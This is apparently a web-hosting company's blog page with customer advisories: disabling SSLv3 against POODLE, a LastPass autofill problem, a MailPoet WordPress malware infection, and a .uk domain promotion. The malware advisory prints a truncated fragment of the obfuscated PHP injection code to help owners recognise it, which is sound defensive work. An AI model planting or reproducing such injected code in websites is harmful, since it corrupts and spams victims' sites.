HostNine’s Leashing of Poodle

On October 14th, Google announced their engineers discovered a flaw in the design of SSL v3, and this vulnerability has been named “POODLE”. Whenever there is an announcement about security vulnerabilities that may affect our customers, we try and make sure that we can you the information so you can understand how these issues may affect you, and what steps we may be taking to address new vulnerabilities.

Poodle

For our hosting customers, we want to let you know that we are disabling SSL v3 on all our servers to ensure your site’s security. Most people should not experience any issues as a result of the changes we’re making – Google estimates this change will affect less than 1% of the internet as the SSL 3.0 protocol is almost 15 years old, but has remained in place to support users running older browsers.

Check out Google’s Security blog for details on how Windows XP or IE6 are vulnerable to malicious code exploiting this problem.

You should also take steps to protect yourself and your browser from the flaw just to be safe. If you are using IE6, you will need to update your version of IE, or consider switching to Chrome or Firefox, to access our services–and to protect yourself and the websites you visit.

If you are using the latest version of Firefox, they will be disabling SSL v3 in their November 25th Firefox update by default, but you don’t have to wait for that update. Mozilla has created a plugin that will allow you to set the minimum SSL version that Firefox will accept, and you can grab it here:

https://addons.mozilla.org/en-US/firefox/addon/ssl-version-control/

To turn off SSLv3 support in Internet Explorer 11:

Setting -> Internet Options -> Advanced Tab -> Uncheck “SSLv3″ under “Security”.

Remedying the LastPass Reseller Central Issue

LastPass is a fabulous password and login management tool that is available for free (and via a paid version with all those super nifty extra features). A lot of us HostNiners use it every day!

Unfortunately, the way it deals with our Reseller Central may cause some issues with your account. When you are logged in and change a setting from within an active page, like the Account Modify page, LastPass autofills the username and first password text boxes with your main RC account login username and password – NOT your cPanel login information. This sometimes causes random cPanel username changes and problems with creating accounts and upgrading plans, among other issues. It can even break all the paths on your site because your cPanel username was modified!

But don’t worry… we’ve got you covered. If you use the LastPass plugin for your web browser:

  1. Click the LastPass icon near the top right-hand corner of your browserShow Matching Sites
  2. Click Show Matching Sites
  3. Click the populated option that is labeled ‘cp.hostnine.com’ or similar
  4. Click Edit
  5. Tick the box near the bottom that says ‘Disable Autofill’
  6. Close your browser and reopen it – magic!

Now when you go to the site to login, simply click the LastPass asterisk near your blank login text fields and and select the applicable site to log in.

Asterisk icon

Note: you can also click the asterisk icon at the top right of your browser window, click Show Matching Sites, and then click the correct login option as well.

Malware Infection Breaking WordPress Websites

There is a known malware infection caused by a serious vulnerability in the MailPoet WordPress plugin. This malicious attack attempts to slyly inject Spam into the hacked site, which is causing websites to break, and focuses predominantly on WordPress sites with outdated plugins or weak admin passwords.
What It Looks Like
The infected PHP code is very buggy and is corrupting legitimate website files, as well as themes and plugin files, which causes PHP errors to be displayed instead of website content:

Parse error: syntax error, unexpected ‘)’ in /home/user/public_html/site/wp-config.php on line 91

After removing the infecting malware, the only way to remedy the issues is to restore the corrupted files from a backup. This is what the malware code looks like:

<?php $pblquldqei = ’5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%xq%x5c%x7825%x5
c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q7825)3
of:opjudovg<~%x5c%x7824!%x5c%x782421787825!|!*!***b%x5c%x7825)…

If you are running MailPoet, we recommend upgrading it to the latest version. If you do not have a firewall on your website, you have to upgrade the plugin or remove it altogether to avoid more issues.

Support
If you aren’t able to fix the issue on your end, please don’t hesitate to contact Support. We’re happy to help.

Get .uk Domains With HostNine for $15 a Year!

protected-smallWe are excited to announce that starting June 10th 2014 you can register .uk domains for just $15 a year!

Here’s what you need to know about the registration process:

  • If you have a unique .co.uk, .org.uk, or other similar domain, the equivalent .uk domain will be automatically reserved for you until June 10, 2019, as long as the domain remains registered.
  • You can check a registrant’s rights with this handy lookup tool: http://www.dotuklaunch.co.uk/rights-lookup-tool.
  • If you want to register a 2nd level .uk domain, such as ‘example.uk’, then the contact info for that domain must be an exact match to the existing equivalent third level .uk domain, like ‘example.co.uk’ or ‘example.org.uk’. If the information is not the same the registration will fail.
  • If there is no equivalent domain with rights already existing within the .uk domain family, by registering the .co.uk you will automatically have the right to register the new .uk domain.

protected-bigNote: if your third level .uk domain name resides at a registrar other than OpenSRS, Nominet will email the registrant to confirm the registration.

We think this new easier-to-use domain extension is a great addition to our current offerings and we’re pleased to be able to offer it to you!

Please contact our Billing department for assistance with registering a new domain name, or if you have any questions regarding the registration process.